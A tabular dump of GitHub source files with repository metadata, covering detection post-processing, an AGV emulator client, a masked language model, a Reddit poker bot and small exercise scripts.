blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bb33ad3ea3a65fcbe419a5cdd37ea445686a3795 | a2548845125656fa47617d34f1b7e00019f5eb74 | /utils/postprocess.py | a6ed9a86b5cc20cee8b1c0138198823ef61d0f6c | [
"BSD-3-Clause"
] | permissive | COSE474-WhereIsMyWaifu/detector | 57f983cd4ed021023cdddd5633c5600afc9108bc | 23c1850899aafa1af35af2a3a3d08ba09272b4b2 | refs/heads/master | 2020-08-30T00:33:56.729047 | 2019-12-23T15:22:56 | 2019-12-23T15:22:56 | 218,216,092 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,418 | py | import numpy as np
import PIL.Image as Image
class PostProcessor(object):
def resize(self, from_size, to_size, prediction):
x_rate = to_size[0] / from_size[0]
y_rate = to_size[1] / from_size[1]
max_rate = max(x_rate, y_rate)
prediction['pred'] = np.array([pred * [max_rate, max_rate, max_rate, max_rate, 1] for pred in prediction['pred']])
prediction['label'] = np.array([label * [max_rate, max_rate, max_rate, max_rate, 1] for label in prediction['label']])
#image = Image.fromarray((prediction['image'] * 255).astype('uint8'))
#image = image.crop(
#image = image.resize(to_size, Image.BILINEAR)
#prediction['image'] = np.array(image)
return prediction
def iou(self, bbox1, bbox2):
w1 = bbox1[2]
w2 = bbox1[2]
h1 = bbox1[3]
h2 = bbox1[3]
left1 = bbox1[0] - w1 / 2
left2 = bbox2[0] - w2 / 2
right1 = bbox1[0] + w1 / 2
right2 = bbox2[0] + w2 / 2
top1 = bbox1[1] + h1 / 2
top2 = bbox2[1] + h2 / 2
bottom1 = bbox1[1] - h1 / 2
bottom2 = bbox2[1] - h2 / 2
area1 = w1 * h1
area2 = w2 * h2
w_intersect = min(right1, right2) - max(left1, left2)
h_intersect = min(top1, top2) - max(bottom1, bottom2)
area_intersect = h_intersect * w_intersect
if h_intersect < 0 or w_intersect < 0:
return 0
iou_ = area_intersect / (area1 + area2 - area_intersect + 1e-9)
return iou_
# all bbox above conf_threshold
def ABOVE(self, prediction, context):
above_thres = prediction[np.where(prediction[:, 4] > context['conf_threshold'])]
return above_thres
# non-maximum suppression
def NMS(self, prediction, context):
above_thres = prediction[np.where(prediction[:, 4] > context['conf_threshold'])]
pred_sorted = np.flip(np.argsort(above_thres[:, 4]))
pred_result = []
for p0 in pred_sorted:
discard = False
for p1 in pred_result:
if self.iou(above_thres[p0], above_thres[p1]) > context['iou_threshold']:
discard = True
break
if discard is False:
pred_result.append(p0)
pred_result = np.array(above_thres[pred_result])
return pred_result
# custom 1
def CUSTOM1(self, prediction, context):
above_thres = prediction[np.where(prediction[:, 4] > context['conf_threshold'])]
pred_sorted = np.flip(np.argsort(above_thres[:, 4]))
pred_result = []
for p0 in pred_sorted:
new_group = True
max_matching_group = 0
max_iou = 0
for g1 in range(0, len(pred_result)):
iou_match = self.iou(above_thres[p0], np.mean(pred_result[g1], axis = 0))
if iou_match > context['iou_threshold']:
new_group = False
if max_iou < iou_match:
max_iou = iou_match
max_matching_group = g1
if new_group is True:
pred_result.append([above_thres[p0]])
else:
pred_result[max_matching_group].append(above_thres[p0])
pred_result = np.array([np.mean(pred_group, axis = 0) for pred_group in pred_result])
return pred_result
def CUSTOM2(self, prediction, context):
above_thres = np.copy(prediction[np.where(prediction[:, 4] > context['conf_threshold'])])
pred_sorted = above_thres[np.flip(np.argsort(above_thres[:, 4]))]
# merge with max iou until converge
pred_result = []
converge = False
while converge is False:
if len(pred_sorted) is 0:
converge = True
break
max_iou = 0
max_indx = 0
p0 = pred_sorted[0]
for p_indx in range(1, len(pred_sorted)):
iou_match = self.iou(p0, pred_sorted[p_indx])
if iou_match > context['iou_threshold'] and iou_match > max_iou:
max_iou = iou_match
max_indx = p_indx
if max_indx is not 0:
weight_0 = pred_sorted[0][4]
weight_1 = pred_sorted[max_indx][4]
weight_sum = weight_0 + weight_1
avg = (pred_sorted[0] * weight_0 / weight_sum) + (pred_sorted[max_indx] * weight_1 / weight_sum)
pred_sorted = np.delete(pred_sorted, max_indx, 0)
pred_sorted = np.delete(pred_sorted, 0, 0)
pred_sorted = np.append(pred_sorted, [avg], 0)
else:
pred_result.append(p0)
pred_sorted = np.delete(pred_sorted, 0, 0)
if len(pred_sorted) is 0:
converge = True
else:
pred_sorted = pred_sorted[np.flip(np.argsort(pred_sorted[:, 4]))]
return pred_result
def calcAccuracyMap(self, truth, truth_len, pred, context):
check_arr = np.zeros(truth_len)
check_fp = 0
for p in pred:
max_indx = -1
max_iou = 0.01
for i in range(0, truth_len):
iou_val = self.iou(p, truth[i])
if max_iou < iou_val:
max_iou = iou_val
max_indx = i
if max_indx is -1:
check_fp = check_fp + 1
else:
if max_iou > context['acc_iou_threshold']:
check_arr[max_indx] = check_arr[max_indx] + 1
else:
check_fp = check_fp + 1
result = {}
result['count'] = truth_len.item()
result['true positive'] = np.argwhere(check_arr != 0).size
result['false negative'] = np.argwhere(check_arr == 0).size
result['false positive'] = check_fp
result['duplicate'] = np.argwhere(check_arr > 1).size
return result
| [
"talluay@gmail.com"
] | talluay@gmail.com |
d2a70095853cf66fcee8f1b49317c3ede2a0e2bf | 7e5160f3b278d6197229a05c6682a9bbfb15504b | /Assignment_2/Q20_datetime_file.py | c55bca04995d49e800fadf507b97f62b6d3d6333 | [] | no_license | hitesh2940/Python_practice | 2a135f22aa13f61a087da6eb29ae7827faa995d4 | 7dcec70e43d167d6ff9d63f3e9016328d22d9057 | refs/heads/main | 2023-08-14T22:58:02.074851 | 2021-09-21T10:06:43 | 2021-09-21T10:06:43 | 399,853,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | #Write a python program to read current date and time, delete content of file JD_file.txt and save date time in it.
import datetime
f = open("JD_file.txt", "r+")
f.seek(0)
f.truncate()
f.close()
ct = datetime.datetime.now()
f=open("JD_file.txt",'w+')
f.write(str(ct))
f.close() | [
"noreply@github.com"
] | hitesh2940.noreply@github.com |
80796e8fe36dfaf85f2154db7bc01de0d37ca837 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/411/usersdata/321/79296/submittedfiles/av1_programa2.py | 7523b13236ebbd307d04c1c424ebe8e6ed24a9a4 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | # -*- coding: utf-8 -*-
#Entrada
a= float(input('Preço normal da etiqueta: '))
b= int(input('Condição de pagamento: '))
#Saídas
if b == 1:
t= a - ((a * 15)/100)
print('%.2f' % t)
elif b == 2:
to= a - ((a * 10)/100)
print('%.2f' % to)
elif b == 3:
print('%.2f' % a)
elif b == 4:
total= a + ((a * 10)/100)
print('%.2f' % total) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
4d37d3f4430224a7d858060b0224715fd558aa1d | 2fdc95192f1b268990cf97efb7970c1c8be8a657 | /E_AGV_V1/run.py | b425dbe65e0e253bf6bf3ac5ec54c0c70c29cef0 | [] | no_license | arrtvv852/AGV-Emulator | 4c9f98779cf6b88dd13d33d388d05eef5c4b70bd | 44faff07dc5bdbc8784e0ae91598ee128e70ed65 | refs/heads/master | 2020-05-04T17:17:20.654877 | 2019-04-03T14:38:33 | 2019-04-03T14:38:33 | 179,305,395 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,126 | py | # -*- coding: utf-8 -*-
"""
Created on Thu May 3 16:32:10 2018
@author: CIMlab徐孟維
"""
import ShopFloor as SF
import socket as SK
import pickle
import threading as td
import tkinter as tk
import time
def Display(Vehicle):
time.sleep(1)
window = tk.Tk()
window.title("AGV Agent")
window.geometry("{}x{}".format(1000, 200))
canvas = tk.Canvas(bg = "white", height = 200, width = 1000)
canvas.pack()
canvas.create_text(100, 70, text = "AGV"+str(Vehicle.ID), font = ("arial", 20), fill = "blue")
canvas.create_text(400, 70, text = "Target job:", font = ("arial", 20), fill = "blue")
canvas.create_text(700, 70, text = "Load:", font = ("arial", 20), fill = "blue")
Target = canvas.create_text(500, 70, text = "", font = ("arial", 20), fill = "red")
Load = canvas.create_text(800, 70, text = "Empty", font = ("arial", 20), fill = "red")
Disp = canvas.create_text(200, 70, text = "IDLE", font = ("arial", 20), fill = "red")
disp = canvas.create_text(500, 140, text = "[]", font = ("arial", 15), fill = "black")
while True:
task = []
for i in Vehicle.status:
if len(task) > 10:
break
if i == 1:
task.append("UP")
elif i == 2:
task.append("DOWN")
elif i == 3:
task.append("LEFT")
elif i == 4:
task.append("RIGHT")
elif i == 5:
task.append("DROP")
elif i == 6:
task.append("PICK")
canvas.update()
time.sleep(0.5)
canvas.delete(disp)
canvas.delete(Disp)
canvas.delete(Target)
canvas.delete(Load)
if Vehicle.Goal >= 0:
target = "Job"+str(Vehicle.Goal)
else:
target = ""
if Vehicle.content != 0:
load = "Job"+str(Vehicle.content)
else:
load = "Empty"
if task == []:
cur = "IDLE"
else:
cur = task.pop(0)
Disp = canvas.create_text(200, 70, text = cur, font = ("arial", 20), fill = "red")
Target = canvas.create_text(500, 70, text = target, font = ("arial", 20), fill = "red")
Load = canvas.create_text(800, 70, text = load, font = ("arial", 20), fill = "red")
disp = canvas.create_text(500, 140, text = str(task), font = ("arial", 15), fill = "black")
def Connect_Center(Vehicle, center, s):
print(center.recv(1000).decode())
center.send("AGV".encode())
while Vehicle.ID == 0:
True
msg = pickle.dumps([Vehicle.ID, Vehicle.Electricity])
center.send(msg)
while True:
msg = pickle.loads(center.recv(1024))
print("Center:", msg[1])
Type = msg[1]
if Type == "New":
Vehicle.Center_New(msg[2], msg[3], msg[4])
elif Type == "S_New":
Vehicle.Center_S_New(msg[2])
elif Type == "Park":
Vehicle.Center_Park()
elif Type == "Resolve":
Vehicle.Center_Resolve(msg[2], s)
elif Type == "StartIdle":
Vehicle.Center_StartIdle()
def Connect_Env(Vehicle, s):
'''
s = SK.socket(SK.AF_INET, SK.SOCK_STREAM)
host = "192.168.0.3"
port = 1000
s.connect((host, port))
'''
print(s.recv(1000).decode())
s.send("AGV".encode())
msg = pickle.loads(s.recv(1024))
Vehicle.ID = msg[0]
Vehicle.Electricity = msg[1]
while True:
msg = pickle.loads(s.recv(1024))
ID, Type = msg[0], msg[1]
access = ["Idle", "Charge", "Pick", "Drop", "Move", "Block", "Task", "LowPower", "Start"]
print(msg)
if ID == Vehicle.ID and Type in access:
if Type == "Idle":
Vehicle.FMS_Idle()
elif Type == "Charge":
Vehicle.FMS_Charge()
elif Type == "Pick":
Vehicle.FMS_Pick(s)
elif Type == "Drop":
Vehicle.FMS_Drop()
elif Type == "Move":
Vehicle.FMS_Move()
elif Type == "Block":
Vehicle.FMS_Block(msg[2])
elif Type == "Task":
Vehicle.FMS_Task(s)
elif Type == "LowPower":
Vehicle.FMS_LowPower()
elif Type == "Start":
Vehicle.FMS_Start(s)
if __name__ == "__main__":
Vehicle = SF.Vehicle(0, 0, 0)
center = SK.socket(SK.AF_INET, SK.SOCK_STREAM)
host = "192.168.0.2"
port = 1001
center.connect((host, port))
Vehicle.connect = center
s = SK.socket(SK.AF_INET, SK.SOCK_STREAM)
host = "192.168.0.3"
port = 1000
s.connect((host, port))
P1 = td.Thread(target = Connect_Env, args = (Vehicle, s))
P2 = td.Thread(target = Connect_Center, args = (Vehicle, center, s))
P3 = td.Thread(target = Display, args = (Vehicle, ))
P1.start()
P2.start()
P3.start()
P1.join()
P2.join()
P3.join() | [
"noreply@github.com"
] | arrtvv852.noreply@github.com |
c99fc98cb19087ac23f06bd2e4062101e9c970b7 | 76ddef791495e09b66e701816d03f2f86aca73d4 | /words.py | f3ec182ec8fcba0ef5fb4c04699deb8d415ea0ad | [] | no_license | kragen/spellmell | 8e1511bdcd69cd0c28e3cbbcf5dd67f49485b85f | f5452e787489f3320b312c80a64cd8b5554cec3e | refs/heads/master | 2021-01-16T00:35:40.105761 | 2008-12-11T02:01:36 | 2008-12-11T02:01:36 | 88,409 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | import re
import sys
def words(text):
return map(stripquote, re.findall("""[a-z']+""", text.lower()) )
def stripquote(s):
#return s.replace("'", "")
return s.strip("'")
for line in sys.stdin:
for word in words(line):
print word
| [
"darius@static.unknown.charter.com"
] | darius@static.unknown.charter.com |
a26b70f1e1d51b49d484ae8516312583af8cba38 | 9079354291951a1782ec43efaead5876895eece8 | /sent_to_vec/masked_lm/pervasive_model.py | bb2efc8c00655a488446593750ed5ca65dab961b | [] | no_license | luungoc2005/nlp-test | c9a2e0174546221b0e6d2501d9c4dfeca5c6efd0 | ed43a4b1bbcd23c3fc39e92d790864c73a5999f3 | refs/heads/master | 2022-12-08T14:17:07.271865 | 2019-05-26T16:23:20 | 2019-05-26T16:23:20 | 125,201,975 | 0 | 0 | null | 2022-12-07T23:37:52 | 2018-03-14T11:24:54 | Jupyter Notebook | UTF-8 | Python | false | false | 5,854 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
from config import LM_VOCAB_SIZE, LM_HIDDEN_DIM, LM_SEQ_LEN, LM_CHAR_SEQ_LEN, START_TAG, STOP_TAG, UNK_TAG, MASK_TAG
from common.modules import LockedDropout, WeightDrop
from common.splitcross import SplitCrossEntropyLoss
from common.wrappers import IModel
from common.torch_utils import to_gpu
from featurizers.basic_featurizer import BasicFeaturizer
from common.splitcross import SplitCrossEntropyLoss
from sent_to_vec.masked_lm.densenet import DenseNet
from sent_to_vec.masked_lm.aggregator import Aggregator
from typing import Union, Iterable, Tuple
class PervasiveAttnLanguageModel(nn.Module):
def __init__(self, config):
super(PervasiveAttnLanguageModel, self).__init__()
self.config = config
self.tie_weights = config.get('tie_weights', True)
self.embedding_dim = config.get('embedding_dim', LM_HIDDEN_DIM)
self.dropout_emb = config.get('emb_dropout', .2)
self.dropout_net = config.get('net_dropout', .2)
self.num_words = config.get('num_words', LM_VOCAB_SIZE)
self.n_layers = config.get('n_layers', 6)
self.use_adasoft = config.get('use_adasoft', True)
self.adasoft_cutoffs = config.get('adasoft_cutoffs', [LM_VOCAB_SIZE // 2, LM_VOCAB_SIZE // 2])
self.encoder = nn.Embedding(
self.num_words, self.embedding_dim
)
self.input_channels = self.embedding_dim * 2
self.net = DenseNet(
self.input_channels,
{
'growth_rate': 32,
'num_layers': [20],
'kernels': [3],
'divde_channels': 2,
'normalize_channels': 0,
'dilation': 1,
'groups': 1,
'layer_type': 'regular',
'transition_type': 1,
'bias': 0,
'gated': 0,
'weight_norm': 0,
'init_weights': 0,
'conv_dropout': self.dropout_net,
'efficient': 1
}
)
self.aggregator = Aggregator(
self.net.output_channels,
self.embedding_dim if self.tie_weights else self.hidden_dim,
{
'mode': 'max',
'first_aggregator': 'max',
'attention_dropout': .2,
'scale_ctx': 1,
'nonlin': 'none',
'mapping': 'linear',
'map_embeddings': 'none'
}
)
self.decoder = nn.Linear(
self.embedding_dim if self.tie_weights else self.hidden_dim,
self.num_words
)
self.adasoft = None
# Weight tying
if self.tie_weights:
self.decoder.weight = self.encoder.weight
self.init_weights()
def init_weights(self):
init_range = 0.1
self.encoder.weight.data.uniform_(-init_range, init_range)
self.decoder.bias.data.zero_()
self.decoder.weight.data.uniform_(-init_range, init_range)
def merge(self, src_emb, trg_emb):
return torch.cat((src_emb, trg_emb), dim=3)
def _expand(self, tensor, dim, reps):
# Expand 4D tensor in the source or the target dimension
if dim == 1:
return tensor.repeat(1, reps, 1, 1)
# return tensor.expand(-1, reps, -1, -1)
if dim == 2:
return tensor.repeat(1, 1, reps, 1)
# return tensor.expand(-1, -1, reps, -1)
else:
raise NotImplementedError
def _forward(self, X, src_lengths=None, track=False):
X = X.permute(0, 3, 1, 2)
X = self.net(X)
if track:
X, attn = self.aggregator(X, src_lengths, track=True)
return X, attn
X = self.aggregator(X, src_lengths, track=track)
return X
def forward(self,
x_input: Union[torch.LongTensor, torch.cuda.LongTensor],
hidden: Union[torch.FloatTensor, torch.cuda.FloatTensor] = None,
training: bool = False) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
training = training or self.training
src_emb = self.encoder(x_input).permute(1, 0, 2)
trg_emb = src_emb.clone()
# trg_emb = self.trg_embedding(data_trg)
Ts = src_emb.size(1) # source sequence length
# Tt = trg_emb.size(1) # target sequence length
# 2d grid:
# src_emb = self._expand(src_emb.unsqueeze(1), 1, Tt)
# trg_emb = self._expand(trg_emb.unsqueeze(2), 2, Ts)
src_emb = self._expand(src_emb.unsqueeze(1), 1, Ts)
trg_emb = self._expand(trg_emb.unsqueeze(2), 2, Ts)
X = self.merge(src_emb, trg_emb)
# del src_emb, trg_emb
# X = self._forward(X, data_src['lengths'])
X = self._forward(X, None)
logits = self.decoder(X).permute(1, 0, 2)
# return logits
return logits, None, None, None
class PervasiveAttnLanguageModelWrapper(IModel):
def __init__(self, config=dict(), *args, **kwargs):
featurizer_config = config
featurizer_config['append_sos_eos'] = True
featurizer_config['featurizer_reserved_tokens'] = [START_TAG, STOP_TAG, UNK_TAG, MASK_TAG]
super(PervasiveAttnLanguageModelWrapper, self).__init__(
model_class=PervasiveAttnLanguageModel,
config=config,
featurizer=BasicFeaturizer(featurizer_config),
*args, **kwargs
)
self.seq_len = config.get('seq_len', LM_SEQ_LEN)
self.config = config
def on_model_init(self):
model = self._model
# def repackage_hidden(self, h) -> Union[torch.Tensor, Tuple]:
# if torch.is_tensor(h):
# return to_gpu(h.detach())
# else:
# return tuple(self.repackage_hidden(v) for v in h)
| [
"luungoc2005@gmail.com"
] | luungoc2005@gmail.com |
d8e1ab0778a17030a2ee03eccba776743384747f | c05577170c952fcac1e832259289a3ad37fbef91 | /group 6 project new.py | c5676068369e458519621f9d771769f7cdf5aac7 | [] | no_license | Bolodeoku1/PET328_2021_Class | b005bfd9c54c9293fb1bfe676a6ed4cf8df6ceae | 58e16e7e10a6b6727bc4e965f4801be8a6b15393 | refs/heads/main | 2023-07-03T06:43:56.010665 | 2021-08-09T21:28:00 | 2021-08-09T21:28:00 | 381,508,480 | 0 | 0 | null | 2021-06-29T22:07:00 | 2021-06-29T22:06:59 | null | UTF-8 | Python | false | false | 503 | py | B_comp = float (input('What is the bit cost?'))
CR_comp = float (input('What is the rig cost per hour?'))
t_comp = float (input('What is the drilling time?'))
T_comp = float (input('What is the round trip time?'))
F_comp = float (input('What is the footage drill per bit?'))
# convert inputs to numerals
# the formula for drilling cost per foot
drilling_cost_per_foot =(B_comp + CR_comp * (t_comp + T_comp))/(F_comp)
print('The drilling cost per foot is {0:.2f} $' .format (drilling_cost_per_foot))
| [
"adewale.bolodeoku@stu.cu.edu.ng"
] | adewale.bolodeoku@stu.cu.edu.ng |
3667b52e372a2dccb9a702ddf3b9a2920f3cc1d3 | adc148caac17c04434e405aff0dcb1839a5b15b1 | /v2/poker_handler.py | eabee06ac30aa23dadedceb459e45f38b6db8469 | [] | no_license | Sophie-Williams/SolutionGambling | 9dca9f2a28d3de9bcc79fd652e0756bbf0935e7e | 4ed17002e2bf4916ab13f4938832220ecdaaa8e6 | refs/heads/master | 2020-05-19T15:32:22.060495 | 2017-08-02T04:03:30 | 2017-08-02T04:03:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,036 | py | import json
import traceback
import time
import deuces
import pika
import praw
import SG_Repository
import SG_Messages
import ConfigParser
import SG_Utils
config = ConfigParser.ConfigParser()
config.read("settings.config")
config_header = "Poker"
username = config.get("General", "username")
version = config.get("General", "version")
starting_balance = int(config.get("General", "starting_balance"))
max_bet = int(config.get(config_header, "bet_limit"))
payout_table = {
0 : 45000,
1 : 4000,
2 : 600,
3 : 55,
4 : 25,
5 : 10,
6 : 5,
7 : 2,
8 : 0,
9 : 0
}
game_type = 'High-hand Poker'
logger_name = 'poker_handler'
def format_wager_reply(username, wager_amount, hand_string, board_string, hand_type, outcome,
winnings, new_balance):
return reply_messages.POKER_SUCCESS_MSG.format(username,
wager_amount,
hand_string,
board_string,
hand_type,
winnings,
new_balance)
def send_royal_message(comment_id):
reddit.redditor('eganwall').message('ROYAL FLUSH BABY', 'SOMEONE HIT A ROYAL! Look here : {}'.format(str(comment_id)))
def deal_hand():
deck = deuces.Deck()
board = deck.draw(5)
hand = deck.draw(2)
# print("Dealing hand: ")
# for current_card in hand:
# card.print_pretty_card(current_card)
# print("Dealing board: ")
# for current_card in board:
# card.print_pretty_card(current_card)
return {'board' : board, 'hand' : hand}
def parse_post_for_wager(post_body, player_balance):
body_tokens = post_body.strip().split(' ')
if len(body_tokens) > 1 and str(body_tokens[0]) == 'wager' and (body_tokens[1].isnumeric() or body_tokens[1] == 'max'):
if(body_tokens[1] == 'max'):
return min(player_balance, max_bet)
else:
return int(body_tokens[1])
return 0
def play_poker(wager_amount, comment_id):
player_hand = deal_hand()
hand_score = evaluator.evaluate(cards=player_hand['hand'], board=player_hand['board'])
hand_class = evaluator.get_rank_class(hand_score)
hand_class_string = evaluator.class_to_string(hand_class)
#print("Player hand class : [raw = {}] [string = {}]".format(hand_class, hand_class_string))
# if we don't have at least 2 pair, we lose
if(hand_class > 7):
outcome = SG_Repository.WagerOutcome.LOSE
winnings = wager_amount * payout_table[hand_class]
# if they hit a royal flush, pay out the special case big payday
elif (hand_score == 1):
outcome = SG_Repository.WagerOutcome.WIN
winnings = wager_amount * payout_table[0]
send_royal_message(comment_id)
else:
outcome = SG_Repository.WagerOutcome.WIN
winnings = wager_amount * payout_table[hand_class]
# build the pretty-printed cards into a string for the dealer reply comment
full_hand_string = """"""
for current_card in player_hand['hand']:
full_hand_string += card.int_to_pretty_str(current_card) + """
"""
full_board_string = """"""
for current_card in player_hand['board']:
full_board_string += card.int_to_pretty_str(current_card) + """
"""
wager_result = {'hand_type' : hand_class_string, 'full_hand_string' : full_hand_string, 'outcome' : outcome,
'winnings' : winnings, 'full_board_string' : full_board_string}
return wager_result
# create our Reddit instance
c_id = config.get(config_header, "client_id")
c_secret = config.get(config_header, "client_secret")
user = config.get(config_header, "plain_username")
pw = config.get(config_header, "password")
reddit = praw.Reddit(
client_id = c_id,
client_secret = c_secret,
username = user,
password = pw,
user_agent = 'Dealer bot v{} by /u/eganwall'.format(version)
)
# initialize our repository and logger
sg_repo = SG_Repository.Repository()
logger = SG_Utils.LogUtility()
# get our messaging classes
error_messages = SG_Messages.ErrorMessages
reply_messages = SG_Messages.ReplyMessages
constants = SG_Messages.MiscConstants
# initialize the classes we need to run the poker game
card = deuces.Card()
evaluator = deuces.Evaluator()
def handle_message(ch, method, properties, body):
# get current time for elapsed time tracking
start_time = time.time()
message = json.loads(body)
# get the comment instance so we can reply to it
comment = reddit.comment(message['comment_id'])
# get the player from the DB so we can validate their wager
# and update their balance
player = sg_repo.GET_PLAYER_BY_USERNAME(comment.author.name)
# create new player if this account hasn't played before
if player is None:
SG_Utils.add_new_player(comment.author.name, message['message_id'])
player = sg_repo.GET_PLAYER_BY_USERNAME(comment.author.name)
# now process the comment
wager_amount = parse_post_for_wager(message['comment_body'], player['balance'])
logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_validated_event,
logger_name, '[wager_amount={}] [game_type={}]'.format(wager_amount, game_type))
if wager_amount <= 0:
#print("Wager amount not valid")
SG_Utils.post_comment_reply(comment, error_messages.POKER_ERROR_MSG, message['message_id'])
ch.basic_ack(delivery_tag=method.delivery_tag)
logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_rejected_event,
logger_name, '[rejected_reason={}] [comment_id={}] [elapsed_seconds={:.3f}]'.format(
SG_Utils.LogUtilityConstants.incorrect_format_reason, message['comment_id'],
SG_Utils.get_elapsed_secs(comment.created_utc, time.time())))
return
if wager_amount > player['balance']:
#print("Player wagered more than their balance")
SG_Utils.post_comment_reply(comment, error_messages.INSUFFICIENT_BALANCE_ERROR_MSG, message['message_id'])
ch.basic_ack(delivery_tag=method.delivery_tag)
logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_rejected_event,
logger_name, '[rejected_reason={}] [comment_id={}] [elapsed_seconds={:.3f}]'.format(
SG_Utils.LogUtilityConstants.insufficient_balance_reason, message['comment_id'],
SG_Utils.get_elapsed_secs(comment.created_utc, time.time())))
return
if wager_amount > max_bet:
#print("Player wagered more than this game's max bet")
SG_Utils.post_comment_reply(comment, error_messages.OVER_MAX_BET_ERROR_MSG.format(max_bet), message['message_id'])
ch.basic_ack(delivery_tag=method.delivery_tag)
logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_rejected_event,
logger_name, '[rejected_reason={}] [comment_id={}] [elapsed_seconds={:.3f}]'.format(
SG_Utils.LogUtilityConstants.over_max_bet_reason, message['comment_id'],
SG_Utils.get_elapsed_secs(comment.created_utc, time.time())))
return
wager_result = play_poker(wager_amount, comment.id)
new_player_balance = player['balance'] - wager_amount + wager_result['winnings']
sg_repo.INSERT_WAGER(player['username'], wager_result['outcome'],
wager_amount, wager_result['winnings'], new_player_balance, game_type)
SG_Utils.update_player_after_wager(player['username'], new_player_balance, player['flair_css_class'], message['message_id'])
reply = format_wager_reply(player['username'], wager_amount, wager_result['full_hand_string'],
wager_result['full_board_string'],
wager_result['hand_type'], wager_result['outcome'], wager_result['winnings'],
new_player_balance)
logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_executed_event,
logger_name, '[outcome={}] [new_balance={}]'.format(wager_result['outcome'], new_player_balance))
SG_Utils.post_comment_reply(comment, reply, message['message_id'])
ch.basic_ack(delivery_tag=method.delivery_tag)
logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.handler_finished_event,
logger_name, 'Handler finished fulfilling request : [comment_id={}] [elapsed_seconds={:.3f}] [processing_time={:.3f}]'.format(
message['comment_id'],
SG_Utils.get_elapsed_secs(comment.created_utc, time.time()),
SG_Utils.get_elapsed_secs(start_time, time.time())))
def safe_handle(ch, method, properties, body):
try:
handle_message(ch, method, properties, body)
except Exception as e:
message = json.loads(body)
logger.log_error_message(message['message_id'], SG_Utils.LogUtilityConstants.exception_event,
logger_name, traceback.format_exc() + "=== END OF STACK TRACE")
ch.basic_ack(delivery_tag=method.delivery_tag)
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost', heartbeat_interval=0))
channel = connection.channel()
channel.queue_declare(queue='poker', durable=True)
channel.basic_consume(safe_handle,
queue='poker')
log_msg = "POKER handler started up - waiting for messages..."
logger.log_info_message('', SG_Utils.LogUtilityConstants.handler_startup_event,
logger_name, log_msg)
channel.start_consuming() | [
"egan.c.wall@gmail.com"
] | egan.c.wall@gmail.com |
f0dd3b2420a5624df7d347b967ad3514ea27823d | d83118503614bb83ad8edb72dda7f449a1226f8b | /src/dprj/platinumegg/test/sceventcastnomination/tanzaku_post.py | aeb7000b88fa6e55783a45f19b4974b7cf7135dc | [] | no_license | hitandaway100/caba | 686fe4390e182e158cd9714c90024a082deb8c69 | 492bf477ac00c380f2b2758c86b46aa7e58bbad9 | refs/heads/master | 2021-08-23T05:59:28.910129 | 2017-12-03T19:03:15 | 2017-12-03T19:03:15 | 112,512,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,568 | py | # -*- coding: utf-8 -*-
from platinumegg.test.base import ApiTestBase, AppTestError
from platinumegg.lib.opensocial.util import OSAUtil
from platinumegg.test.dummy_factory import DummyType
from platinumegg.test.util.scoutevent import ScoutEventTestUtil
from defines import Defines
from platinumegg.app.cabaret.util.api import BackendApi
from platinumegg.app.cabaret.util.db_util import ModelRequestMgr
class ApiTest(ApiTestBase):
"""スカウトイベント短冊投入書き込み.
"""
def setUp(self):
# 報酬.
prize = self.create_dummy(DummyType.PRIZE_MASTER, gold=100, gachapt=10)
# イベントマスター.
pointprizes = [
[1, [prize.id]],
]
event_args = dict(pointprizes=pointprizes, lovetime_star=10, lovetime_timelimit=3600)
eventstage_args = dict(execution=1000, lovetime_star_min=1)
self.__scoutevent_util = ScoutEventTestUtil(self, event_args, eventstage_args)
# 短冊.
self.__tanzakumaster = self.__scoutevent_util.create_tanzakumaster(0, [prize.id], 1)
# Player.
self.__player0 = self.__scoutevent_util.create_player()
self.__tanzakudata = self.__scoutevent_util.create_tanzakudata(self.__player0.id, tanzaku_nums={self.__tanzakumaster.number:self.__tanzakumaster.tanzaku})
# とりあえずステージを1つ追加.
self.__scoutevent_util.add_stages_by_maxnumber(1)
# イベント発生中設定.
self.__scoutevent_util.set_scoutevent_open()
def get_query_params(self):
return {
OSAUtil.KEY_OWNER_ID:self.__player0.dmmid,
}
def get_args(self):
return {
Defines.URLQUERY_ID:self.__tanzakumaster.number,
}
def check(self):
keys = (
'redirect_url',
)
for k in keys:
if self.response.get(k, None) is None:
raise AppTestError(u'%sが設定されていない' % k)
